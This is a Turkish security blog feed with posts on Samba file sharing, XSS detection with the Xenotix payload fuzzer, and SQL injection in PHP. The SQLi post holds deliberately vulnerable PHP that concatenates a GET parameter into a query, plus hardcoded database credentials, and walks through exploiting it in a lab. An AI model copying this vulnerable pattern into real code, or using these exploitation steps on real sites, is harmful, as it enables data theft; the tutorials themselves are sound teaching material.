tag:blogger.com,1999:blog-9253708197813760222024-03-05T21:42:43.566+03:00İsmail SaygılıSiber Güvenlik/Bilgi Güvenliğiİsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.comBlogger40125tag:blogger.com,1999:blog-925370819781376022.post-75358904530148365302015-01-12T13:51:00.000+02:002018-10-25T14:39:13.169+03:00Linux'ta Samba ile Dosya/Klasör Paylaşımı<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9fvbSGytNjNPFcOsCApNLLCRSPed3d125TjWR26kBJDQLYl5yF9FDjgTi-TI1aJ7z8CM04HAu_l4afTbOD7fXZwrIpvwiosSbzUityzO-osHNheytZGPBOmGBP4oGye4NJPNti4mQCexg/s1600/Network-file-sharing.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="134" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9fvbSGytNjNPFcOsCApNLLCRSPed3d125TjWR26kBJDQLYl5yF9FDjgTi-TI1aJ7z8CM04HAu_l4afTbOD7fXZwrIpvwiosSbzUityzO-osHNheytZGPBOmGBP4oGye4NJPNti4mQCexg/s1600/Network-file-sharing.jpg" width="200" /></a></div>
Kurumsal ortamlarda Windows işletim sistemleri üzerinde etkin olarak dosya ve klasör paylaşımları kullanılmaktadır. Bu özellik elbette Linux platformlarında da mevcuttur. Bu blog yazısında bir Linux dağıtımı (Ubuntu) üzerinden klasör paylaşıma açılıp Windows üzerinden klasöre ulaşma hakkında bilgi paylaşımı yapılacaktır.<br />
<br />
<br />
Öncelikle Linux'a <b>Samba </b>yüklemesi yapacağız. Samba yükleme komutu:<br />
# <b>apt-get install samba</b><br />
<br />
Masaüstünde <b>paylasalim</b> isminde yeni bir klasör oluşturup <b>everyone (read-write)</b> yetkisi verelim:<br />
<br />
# <b>cd Desktop</b><br />
# <b>mkdir -p paylasalim</b><br />
# <b>chmod 777 paylasalim</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-mgWfFw5_tKxopT7s_ulATh7SfRt339fC8TDNRmfd_NsuC6T_C24wo2sLQO-E8Y9SBmxGUXsnOA2LbPbpXaxXJKbq73EprVSj5bPcOJGxd4GPsk6fxhgLXGLPwMuBlKlAR5baP1vzKOzT/s1600/samba1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-mgWfFw5_tKxopT7s_ulATh7SfRt339fC8TDNRmfd_NsuC6T_C24wo2sLQO-E8Y9SBmxGUXsnOA2LbPbpXaxXJKbq73EprVSj5bPcOJGxd4GPsk6fxhgLXGLPwMuBlKlAR5baP1vzKOzT/s1600/samba1.png" width="400" /></a></div>
<br />
<a name='more'></a><b><br /></b>
<b>/etc/samba/smb.conf</b> dosyası açılarak en altına aşağıdaki ifadeler eklenir:<br />
<br />
<b><span style="color: red;">[paylasim$]</span></b><br />
<b><span style="color: red;"> comment = dosya paylasimi yapilmaktadir.</span></b><br />
<b><span style="color: red;"> path = /root/Desktop/paylasalim</span></b><br />
<b><span style="color: red;"> browseable = yes</span></b><br />
<b><span style="color: red;"> guest ok = yes</span></b><br />
<b><span style="color: red;"> read only = yes</span></b><br />
<b><span style="color: red;"> public = yes</span></b><br />
<b><span style="color: red;"> writable = yes</span></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz83hgBX5tg9eo0JhO4oOjngZle8DO1YQk7brYw579RxCk4N6eTz1WDACAXpLg4UaHpVjO4eAVW3iJgeTwjNcJMW-AbZQ_kaayTbqMqJZ3yZU_H8x2mRNV42DtWJN8PIiIcouqtKJs9Nxg/s1600/samba2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="203" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgz83hgBX5tg9eo0JhO4oOjngZle8DO1YQk7brYw579RxCk4N6eTz1WDACAXpLg4UaHpVjO4eAVW3iJgeTwjNcJMW-AbZQ_kaayTbqMqJZ3yZU_H8x2mRNV42DtWJN8PIiIcouqtKJs9Nxg/s1600/samba2.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
Dosya üzerinde gerekli değişiklikler yapıldıktan sonra, Linux üzerinde Samba servisi başlatılır:<br />
# <b>service samba start</b><br />
<br />
Artık ağdaki Windows bilgisayardan <b>\\IPADRESI\paylasim$</b> komutu çalıştırılınca, Linux bilgisayarın <b>/home/ismail/Desktop/paylasim</b> dizinine erişim sağlanmış olacaktır.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnTsiUHFpupoAcvLOnQJ-a9ilYdd4d7sWJsNzrmVs9ovFkkVB4c_r4FBj3y3SZYrLWtUyr2xX9alQONjvwP1tw9ZGib3Mhx9O9CVuDa2Sn5v9iRBeOFr2M2_ZgOPSM6obOU6cz3g1fG_XT/s1600/samba3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnTsiUHFpupoAcvLOnQJ-a9ilYdd4d7sWJsNzrmVs9ovFkkVB4c_r4FBj3y3SZYrLWtUyr2xX9alQONjvwP1tw9ZGib3Mhx9O9CVuDa2Sn5v9iRBeOFr2M2_ZgOPSM6obOU6cz3g1fG_XT/s1600/samba3.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiDpPwe2Ho42w_FfVi5D4b_FYxwWSLEnAJW_kjjHpThHrGSVzNXDp6LhJFfDEUpMn2tNaAD_s5mcorx0loe6YDyXid2kvggDwwOYRRG0355x7Yx_v2oa6GhFMR2n1mrvlpvJXP05bZoDRr/s1600/samba4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiDpPwe2Ho42w_FfVi5D4b_FYxwWSLEnAJW_kjjHpThHrGSVzNXDp6LhJFfDEUpMn2tNaAD_s5mcorx0loe6YDyXid2kvggDwwOYRRG0355x7Yx_v2oa6GhFMR2n1mrvlpvJXP05bZoDRr/s1600/samba4.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div>
<br /></div>
İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com40tag:blogger.com,1999:blog-925370819781376022.post-31672007903851579912014-11-18T13:45:00.002+02:002018-10-25T14:42:01.277+03:00Python Simple PhpBug FinderMerhaba Arkadaşlar,<br />
<br />
Farkındayım uzun zamandır bloga yazı yazmıyorum ancak mazeretim var, uzun süredir iş yoğunluğum mevcut. Bu yüzden maalesef pek fırsatım olmuyor..<br />
<br />
Bugün yedek alırken eski arşivlere göz attım. Programlamaya yeni başladığım zamanlarda yazdığım birkaç programcığa rastladım :)<br />
Vakti zamanında Python programlama dili ile Linux ortamında çalışıp Linux'un komut gücünü kullanarak PHP scriptler üzerinde basit bir bug bulucu yapmışım :)<br />
<br />
Ekran görüntüsü:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc9Ly7BGgjQwM95o8SIKrRP9CAygC327JSfwDtZhm_IxU3b0Q0l9-TdwobBVZphY5Fio8hgWyexdqcU-eRA5m_Zl6oMvXDO6z557GLOUnjg-nyr9CwzJ2B2cQNAzxq0LWfbmugv4aiCK30/s1600/iso-bug-finder.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="342" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc9Ly7BGgjQwM95o8SIKrRP9CAygC327JSfwDtZhm_IxU3b0Q0l9-TdwobBVZphY5Fio8hgWyexdqcU-eRA5m_Zl6oMvXDO6z557GLOUnjg-nyr9CwzJ2B2cQNAzxq0LWfbmugv4aiCK30/s1600/iso-bug-finder.png" width="640" /></a></div>
<br />
Örneğin yukarıdaki çıktıya bakacak olursak;<br />
<br />
<b>cat.php</b> dosyasının <b>5.</b> satırındaki " <b>pageID= $_GET['pid'];</b> " ibaresi potansiyel bir XSS açığının olduğunu söylemektedir.<br />
<br />
<i><b>Programın kodlarını buradan indirebilirsiniz: http://pastebin.com/tUs0w2u7</b></i><br />
<br />
Umarım yararlı olur, iyi günler.İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com0tag:blogger.com,1999:blog-925370819781376022.post-11648679628017965722014-06-24T16:55:00.000+03:002018-10-25T14:51:33.829+03:00Xenotix XSS Exploit Framework ile XSS Tespiti<h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisXhNTl9hEhgLQPonuXdVCQTpdQ9AlCncfzexp_bXejBrO8_OmXKAtSg4MQikP3Q4RIm7m53KRdcIsyHuSpmrSuudROyeGyyDLH6uUtSc-SfeNceHtEEGtqt0Gzf1PijPspvwtR4GzF2tG/s1600/cross-site-scripting-xss.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisXhNTl9hEhgLQPonuXdVCQTpdQ9AlCncfzexp_bXejBrO8_OmXKAtSg4MQikP3Q4RIm7m53KRdcIsyHuSpmrSuudROyeGyyDLH6uUtSc-SfeNceHtEEGtqt0Gzf1PijPspvwtR4GzF2tG/s1600/cross-site-scripting-xss.png" width="200" /></a></div>
XSS (Cross-site Scripting) Zafiyeti Nedir?</h4>
Kaba yorum ile; web uygulamasında açığın meydana geldiği input/inject point (veri girişi) alanına gönderilen kötü niyetli javascript kodlarının, kullanıcının web tarayıcısında çalıştırıldığı bir saldırı türüdür. Yani Client-Side (kullanıcı taraflı) bir saldırıdır.<br />
URL adreslerindeki query stringler ve form alanlarında sıklıkla görülür.<br />
Phishing saldırılarına zemin oluşturur.<br />
Genellikle POST ve GET metotlarının kullanıldığı alanlarda olur.<br />
<br />
<b>Çeşitleri:</b><br />
Reflected (Yansıyan), Stored (Depolanan) ve Dom-based olarak üç çeşittir.<br />
<br />
<b>Reflected XSS</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7xVHsY5yf13Voxly7hbj6A4hNFjrprAsSp9owkZH9goxKV3U2P9JM3cCwo6QvYyN7dONLoD0ZT1-avj19kyssKSBzchANfTbEF0xcmuxjiOrHqTbM8w3V9X2rGeJWQJ27wkohTWSnkHgh/s1600/reflected-xss-diyagram.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7xVHsY5yf13Voxly7hbj6A4hNFjrprAsSp9owkZH9goxKV3U2P9JM3cCwo6QvYyN7dONLoD0ZT1-avj19kyssKSBzchANfTbEF0xcmuxjiOrHqTbM8w3V9X2rGeJWQJ27wkohTWSnkHgh/s1600/reflected-xss-diyagram.png" width="640" /></a></div>
<br />
<b>Stored XSS</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi33-eK0RIqw8nf3PBexm3qRPQ4tPBDnTI9UmJGvHMJwnPK7zg1xMWglH0XrhgV_yaZyHtdheXIxiflPKcULxn2Wv5eL3J4u6OG8kyYtrambbSM1lRs1dl7WGV4ka5CPqT5C1HX1Klw7ujF/s1600/stored-xss-diyagram.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="402" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi33-eK0RIqw8nf3PBexm3qRPQ4tPBDnTI9UmJGvHMJwnPK7zg1xMWglH0XrhgV_yaZyHtdheXIxiflPKcULxn2Wv5eL3J4u6OG8kyYtrambbSM1lRs1dl7WGV4ka5CPqT5C1HX1Klw7ujF/s1600/stored-xss-diyagram.png" width="640" /></a></div>
<br />
<b>Etkileri:</b><br />
Yazılım betiklerinin kullanıcı tarafında çalıştırılması sonucunda kullanıcının oturum bilgileri çalınabilir, web tarayıcısı (browser) ele geçirilebilir veya bilgisayarına zararlı kodlar enjekte edilerek ve bilgisayar yönetimi ele geçirilebilir...<br />
<h4>
XSS Zafiyeti Nasıl Oluşur?</h4>
Temel olarak web uygulamada kullanıcının veri girişi yaptığı alanlarda meta-karakterlerin filtrelenmemesinden kaynaklanmaktdır.<br />
<h4>
XSS Zafiyetine Nasıl Önlem Alınabilir?</h4>
<ul>
<li>Web uygulamalarında kullanıcının veri girişine izin verilen alanlarda filtreleme yaparak bu açıkları kapatabilirsiniz. Veri girişinin filtrelenmesi kadar veri çıkışının da incelenmesi web uygulamalarının güvenliğini arttıracaktır. Aşağıda belirtilen karakterlerin filtrelenmesi web uygulamaların güvenliğini sağlayacaktır:<br />[<b style="text-align: center;"><span style="color: red;">'</span></b><span style="text-align: center;">],[</span><b style="text-align: center;"><span style="color: red;"><</span></b><span style="text-align: center;">],[</span><span style="color: red; text-align: center;"><b>></b></span><span style="text-align: center;">],[</span><span style="color: red; text-align: center;"><b>;</b></span><span style="text-align: center;">],[</span><span style="color: red; text-align: center;"><b>/</b></span><span style="text-align: center;">],[</span><span style="color: red; text-align: center;"><b>?</b></span><span style="text-align: center;">],[</span><span style="color: red; text-align: center;"><b>=</b></span><span style="text-align: center;">],[</span><span style="color: red; text-align: center;"><b>&</b></span><span style="text-align: center;">],[</span><span style="color: red; text-align: center;"><b>#</b></span><span style="text-align: center;">],[</span><span style="color: red; text-align: center;"><b>%</b></span><span style="text-align: center;">],[</span><span style="color: red; text-align: center;"><b>{</b></span><span style="text-align: center;">],[</span><span style="color: red; text-align: center;"><b>}</b></span><span style="text-align: center;">],[</span><span style="color: red; text-align: center;"><b>|</b></span><span style="text-align: center;">],[</span><span style="color: red; text-align: center;"><b>@</b></span><span style="text-align: center;">],[</span><span style="color: red; text-align: center;"><b>\</b></span><span style="text-align: center;">],[</span><span style="color: red; text-align: center;"><b>"</b></span><span style="text-align: center;">]</span>Ayrıca bu tür karakterlerin gerektiği ortamlarda, girilen verinin encode edilmesi gerekebilir. NOT: Eğer uygulanabiliyorsa filtrelemelerde BlackList yerine WhiteList kullanılması daha güvenli olacaktır.</li>
</ul>
<ul>
<li>Çerezlerin güvenli hale getirilmesi web uygulamalarının güvenliğini arttırmak adına yapılabilecek en önemli işlemlerdendir. Çerezler içinde kullanıcı adı, şifre ve oturum durumunun saklanmasından kaçınılmalıdır. Eğer tutulması gerekiyorsa şifreli olarak tutulması tercih edilmelidir.</li>
<li>Çerezlere “httponly” set edilmelidir.</li>
</ul>
<ul>
<li>Donanımsal/Yazılımsal Web Application Firewall (WAF) ile web uygulamasında varolan bir zafiyetin saldırgan tarafından keşfedilme aşamasını zorlaştırıp, loglayıp, bloklayabilirsiniz.</li>
</ul>
<ul>
<li>Belirli periyotlarda içeriden ve dışarıdan web uygulama güvenlik testleri (penetrasyon testi) yaptırarak güvenlik açıklarının keşfi ve önlem alınması sisteminizi daha güvenli kılacaktır.</li>
</ul>
<div>
<a name='more'></a></div>
<h2>
Xenotix XSS Exploit Framework ile Web Uygulamada XSS Tespiti</h2>
<b>Xenotix XSS Exploit Framework Nedir? Ne iş yapar bu alet?</b><br />
Web uygulamalarında çeşitli yöntemlerle XSS zafiyetinin keşfi ve sonrasında bulunan zafiyeti sömürebilmek için bünyesinde birçok exploiting araçları bulunmaktadır.<br />
<br />
<b>Amaç:</b><br />
Hedef web uygulamasının veri girişi yapılabilen bir alanını (inject point) göze kestirip o alana yaklaşık 1600 küsür XSS payloadını otomatik test eden Xenotix programını kullanarak XSS tespit etmek.<br />
<br />
<b><a href="https://www.owasp.org/index.php/OWASP_Xenotix_XSS_Exploit_Framework" target="_blank">Xenotix XSS Exploit Framework İndir/Download</a></b><br />
<br />
<b>Kullanımı:</b><br />
Programı indirip çalıştırdığımızda hemen <i>Settings</i> menüsü altından <i>Configure Server</i> seçeneğine girip çıkan pencereden Xenotix'in XSS exploiting için kullandığı <i>QuickPHP Web Server</i> servisin başlaması için <i>Start</i> butonuna bastığımızda artık program iş yapmaya hazır hale gelecektir.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgff9PBjvvrzVyv3vG4aU11ki91ScGCbd0CnPTcbknO06oPuovwI_L5C836AV9qfsyiKqBOOzYrFbxFAXppBqAgppnOMehz6Wa1tapNAp7U9n1AUyp1_ETC-sf6FW3jA2TvyT_azyecdS21/s1600/xenotix-xss-exploit-framework.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgff9PBjvvrzVyv3vG4aU11ki91ScGCbd0CnPTcbknO06oPuovwI_L5C836AV9qfsyiKqBOOzYrFbxFAXppBqAgppnOMehz6Wa1tapNAp7U9n1AUyp1_ETC-sf6FW3jA2TvyT_azyecdS21/s1600/xenotix-xss-exploit-framework.png" width="640" /></a></div>
<i>Hide</i> butonuna basarak popup pencereyi kapatabilirsiniz.<br />
<br />
<i>URL</i> kısmına hedef web uygulamasının linki eklenip <i>Parameter</i> kısmına da XSS'e uğrayan parametreyi yazıyoruz:<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimEFEehsk0mBKFU5Ve8UGOeixsWnSl8W2ES5zmryPDmLI7a7UYPKeWVIVv4gA_Az1oKcLLZ_dZ6P50yj3UsI5UqTtAGUQbn8Ob7qtbhVRYqhc_YU13p_mykLqlkul4YVFgXtxFa9m7xyfD/s1600/xenotix-xss-exploit-framework2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimEFEehsk0mBKFU5Ve8UGOeixsWnSl8W2ES5zmryPDmLI7a7UYPKeWVIVv4gA_Az1oKcLLZ_dZ6P50yj3UsI5UqTtAGUQbn8Ob7qtbhVRYqhc_YU13p_mykLqlkul4YVFgXtxFa9m7xyfD/s1600/xenotix-xss-exploit-framework2.png" width="640" /></a></div>
<br />
Daha sonra <i>Scanner</i> menüsünün altından <i>GET Request Manuel Mode</i> seçeneğini tercih edersek bir XSS payload sayacıyla karşılaşacağız ve <i>Next Payload</i> dedikçe sırayla kodları parametre sonrasına ekleyip üç farklı web tarayıcı üzerinde sonucu gösterecektir. Eğer <i>GET Request Auto Mode</i> seçeneğini tercih edersek de sayaçla uğraşmayacağız, Xenotix kendisi sırayla XSS payloadlarını deneyecektir, bize sadece ekrandan takip etmek düşecektir:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8fj3iyPLi5JPJF82x2PXNLSTxJKuF5G2yuJ1bAggCSaNVmetPNwip7jv-qy1sEzjaaON2svzySF3rzIOAVWVPKK2ghF0fJD6QnTCEjnB5Ry9XBd4FnTYvRIzOKiBdYPUuj2ftb3e_6VJr/s1600/xenotix-xss-exploit-framework4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8fj3iyPLi5JPJF82x2PXNLSTxJKuF5G2yuJ1bAggCSaNVmetPNwip7jv-qy1sEzjaaON2svzySF3rzIOAVWVPKK2ghF0fJD6QnTCEjnB5Ry9XBd4FnTYvRIzOKiBdYPUuj2ftb3e_6VJr/s1600/xenotix-xss-exploit-framework4.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Görüldüğü gibi ben manuel modu seçtim ve next diyerek 19. payloadda XSS'i yakaladım. Üç farklı web tarayıcısında da başarılı bir şekilde çalıştığını gördüm.<br />
Payload bölümünden hedef parametreye hangi XSS paylodının kullanıldığını görebiliriz.<br />
<br />
<i><b>NOT:</b> Bir sonraki Xenotix ile ilgili blog yazımda, keşfedilen XSS zafiyeti sonrası programın exploiting özelliklerinden bahsedeceğim.</i>İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com4tag:blogger.com,1999:blog-925370819781376022.post-19531190225586972382014-05-14T19:00:00.000+03:002018-10-25T14:54:38.822+03:00PHP Scriptlerde SQLi Tespiti ve Exploit Etme<div class="tr_bq">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgypMCUs9vhxYVxD8_V0hlZB5OKxCL_2uS6u21_ht8uo_P4Fq3OuJ6jSia6iA2m6L4Z4hlTQV1Flsz1ep5qAYbb0KRwKw0EJKyQqqOPV6ccmsHzpsQPT8AtXWUXXaamWKraNyQ-15i2KnU/s1600/Bug-hunting-microsoft.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="195" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgypMCUs9vhxYVxD8_V0hlZB5OKxCL_2uS6u21_ht8uo_P4Fq3OuJ6jSia6iA2m6L4Z4hlTQV1Flsz1ep5qAYbb0KRwKw0EJKyQqqOPV6ccmsHzpsQPT8AtXWUXXaamWKraNyQ-15i2KnU/s1600/Bug-hunting-microsoft.jpg" width="200" /></a></div>
NŞA'da PHP scriptler üzerinde iki yöntem ile zafiyet araştırmaları yapılabilir.</div>
<br />
<ol>
<li>Manuel Araştırma</li>
<li>Otomatik Kaynak Kod Tarayıcılarla</li>
</ol>
<br />
Biz bu blog yazısında iki yöntemi de kullanarak <u>temel anlamda</u> PHP scriptlerde zafiyetler (SQLi, XSS, RCE, LFI vb.) nasıl keşfedilir ve nasıl exploit (sömürme) edilebilir bunlara değineceğiz.<br />
<h4>
SQL Injection Nedir?</h4>
Web uygulamalarında birçok işlem için kullanıcıdan alınan veri ile dinamik SQL cümlecikleri oluşturulur. Örneğin; "<i>SELECT * FROM Products</i>" örnek SQL cümleciği basit şekilde veritabanından web uygulamasına tüm ürünleri döndürecektir. Bu SQL cümlecikleri oluşturulurken araya sıkıştırılan herhangi bir meta-karakter SQL Injection'a neden olabilir.<br />
<a name='more'></a><br />
Öncelikle örnek olması açısından SQL Injection açığı barındıran bir betik ile başlayalım.<br />
Betiğimizin görevi; üye id'sine göre veritabanından o id'ye sahip üyenin bilgilerini ekrana yazdırmaktadır.<br />
<br />
<b>sqli</b> isimli bir veritabanı oluşturdum ve içinde <b>uye </b>isimli bir tablo mevcut. Tablonun da 4 adet sütunu var. Sütunlar: <b>id, username, password, email</b><br />
Son olarak da içine örnek birkaç adet veri girişi yaptım:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOtFUuJLK8SHz-m_TZRxX2RaasuYhLSoX8Svwv8EU2c2ChLHBfpGJhZgLTpu3dMxlcwO6Q0cujq0D9bhG8iJDvfUmc2DqtssoPRGONnt1uI252Bd_IK7kiy7uNytHTCoGr-eeqam6S5dZQ/s1600/sqli-researching1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="443" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOtFUuJLK8SHz-m_TZRxX2RaasuYhLSoX8Svwv8EU2c2ChLHBfpGJhZgLTpu3dMxlcwO6Q0cujq0D9bhG8iJDvfUmc2DqtssoPRGONnt1uI252Bd_IK7kiy7uNytHTCoGr-eeqam6S5dZQ/s1600/sqli-researching1.png" width="640" /></a></div>
<br />
Betiğimizi oluşturan <b>uye.php</b> dosyasının kodları aşağıdaki gibidir:<br />
<blockquote>
<?php </blockquote>
<blockquote>
$baglan = mysql_pconnect("localhost","root","123456"); / veritabanına bağlanıyoruz<br />
$baglan = mysql_select_db("sqli",$baglan); / oluşturduğumuz veritabanımızı seçiyoruz</blockquote>
<blockquote>
<span style="color: red;"><b>$id = $_GET["id"];<br />$sorgu = "SELECT * FROM uye WHERE id=".$id;</b></span><br />
$cek = mysql_fetch_object(mysql_query($sorgu)); </blockquote>
<blockquote>
echo 'Olusan Sorgu: '.$sorgu."<br>";<br />
echo $cek->username."<br>".$cek->email; </blockquote>
<blockquote>
?></blockquote>
Bu betiği SQL Injection'a uğratan kod kısımlarını kırmızı renkle vurgulayarak gösterdim..<br />
Böyle bir kod yazımı göstere göstere SQL Injection zafiyetine zemin oluşturmaktadır. Zafiyete neden olan <b>id=</b> query stringinin filtrelenmeden dinamik sql sorgusuyla birleştirilmesidir.<br />
<br />
Manuel yolla ve genel olarak PHP scriptlerde SQL Injection zafiyetini yukarıdaki kod örneğindeki gibi tespitini yapabiliriz. Yani dinamik sorgu cümleciklerine ve hangi yöntemlerle sorgu çekildiklerine odaklanılmalıdır.<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
uye.php çalıştırıldığında görüldüğü gibi 1 id'sindeki bilgiler yani benim bilgilerim ekrana yazdırıldı:<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpiF2KsYqDjWP93fsFcBiDXU0tLQqJ_rlS0tgrqkUOo6DtR4uB3DEhcK7MGsRx35CINTc40gQ0wBFERol_3OX1JpOPzWp95G7R2WEt4hRah8m3eEbGwMQ7hlq6JNh3QmHpogXN_0H7Tp8k/s1600/sqli-researching2.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpiF2KsYqDjWP93fsFcBiDXU0tLQqJ_rlS0tgrqkUOo6DtR4uB3DEhcK7MGsRx35CINTc40gQ0wBFERol_3OX1JpOPzWp95G7R2WEt4hRah8m3eEbGwMQ7hlq6JNh3QmHpogXN_0H7Tp8k/s1600/sqli-researching2.png" /></a><br />
Fakat zayıf bir kod yazım şekli kullandığımız için şimdi bunu SQL Injection saldırısına uğratalım, nasıl mı? id=1 ifadesinden sonra <span style="color: red;"><b>'</b></span> (tek tırnak) meta-karakterini kullanarak:<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTMkuOUrHc3Rd6iY8eqbyuTixFmMyTJND3zt14dTIeR4wnCR2T1LTu7JGoFVaKrtC3rydjBguUkrMhGg957re2kzmjXhU3nLLCZhGcnhp8dLHi8CSzKmJ7u1iISWcCH51KVTn_h9uS-NIM/s1600/sqli-researching3.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTMkuOUrHc3Rd6iY8eqbyuTixFmMyTJND3zt14dTIeR4wnCR2T1LTu7JGoFVaKrtC3rydjBguUkrMhGg957re2kzmjXhU3nLLCZhGcnhp8dLHi8CSzKmJ7u1iISWcCH51KVTn_h9uS-NIM/s1600/sqli-researching3.png" width="640" /></a><br />
<br />
Sayfa <i><b>Warning: mysql_fetch_object()...</b></i> hatası verdi! Şimdi sıra geldi bunu sömürmeye yani exploit etmeye :) Veritabanından hassas veriyi sızdırıyoruz:<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSP8sGAN8s1kTBrDTk3WtYjtP1O1mzSAKbmzFORGs907-bXxuk6Jr_qScMevn-0JNuL-NNxhJsBdZCkYFzesSc7a2voeMwZIjEqIcpWo9JEAhZxSnfPmzyKxokD_AWxbQNj4hYSkTOYdhR/s1600/sqli-researching4.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSP8sGAN8s1kTBrDTk3WtYjtP1O1mzSAKbmzFORGs907-bXxuk6Jr_qScMevn-0JNuL-NNxhJsBdZCkYFzesSc7a2voeMwZIjEqIcpWo9JEAhZxSnfPmzyKxokD_AWxbQNj4hYSkTOYdhR/s1600/sqli-researching4.png" width="640" /></a><br />
Görüldüğü gibi bilgiler ekrana yansıdı:<br />
<i>username: <b>ismailsaygili</b></i><br />
<i>password: <b>iso123</b></i><br />
<br />
Aynı exploiting işlemini bir de otomatize araç olan <b>SQLMap</b> ile exploit edelim:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiModJJvqEn86Vx06M8xCxa6z-609UDWH4jjhWJhM55wJp6F5hZyOQOs4uoMiAD16wAPwZ494BUnS-YmxSipIx5KUb47LZT65ZsFTjZgQEAaCbT7ux0rggHMnZyRaEij7Mn0BMpWqGner9T/s1600/sqli-researching5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="420" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiModJJvqEn86Vx06M8xCxa6z-609UDWH4jjhWJhM55wJp6F5hZyOQOs4uoMiAD16wAPwZ494BUnS-YmxSipIx5KUb47LZT65ZsFTjZgQEAaCbT7ux0rggHMnZyRaEij7Mn0BMpWqGner9T/s1600/sqli-researching5.png" width="640" /></a></div>
<br />
